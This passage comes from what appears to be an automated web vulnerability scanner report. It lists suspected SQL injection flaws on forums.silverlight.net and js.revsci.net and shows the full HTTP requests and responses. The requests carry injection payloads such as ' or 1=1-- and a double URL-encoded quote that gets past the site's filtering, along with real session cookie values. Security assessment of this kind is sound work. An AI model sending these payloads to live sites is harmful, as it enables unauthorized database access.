Path:   /user/viewonline.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ASP.NET_SessionId cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv';

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 104849
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:11:00 GMT; expires=Mon, 30-Jan-2012 16:11:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=se2isf55pdj1fz45lo4mp3no; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:31:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:10:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.15. http://forums.silverlight.net/user/viewonline.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload 12539998'%20or%201%3d1--%20 was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Referer: http://www.google.com/search?hl=en&q=12539998'%20or%201%3d1--%20

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 134518
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:13:12 GMT; expires=Mon, 30-Jan-2012 16:13:12 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:33:12 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:13:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.16. http://forums.silverlight.net/user/viewonline.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 126254
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT; expires=Mon, 30-Jan-2012 16:12:38 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

Request 2

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 125316
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:51 GMT; expires=Mon, 30-Jan-2012 16:12:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...

1.17. http://forums.silverlight.net/user/viewonline.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx?1'=1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 124531
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:31 GMT; expires=Mon, 30-Jan-2012 16:12:31 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.18. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The omniID cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the omniID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a'%20and%201%3d1--%20; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 260462
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:07:50 GMT; expires=Mon, 30-Jan-2012 16:07:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:27:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.19. http://js.revsci.net/gateway/gw.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /gateway/gw.js'%20and%201%3d1--%20 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1488
Date: Sun, 30 Jan 2011 02:09:10 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
<pre>java.lang.NullPointerException
   com.revenuescience.util.CustomerConfigManager.getCustomerConfig(CustomerConfigManager.java:20)
   com.revenuescience.audiencesearch.jss.gs.GatewayServlet.doGet(GatewayServlet.java:202)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>

Request 2

GET /gateway/gw.js'%20and%201%3d2--%20 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; 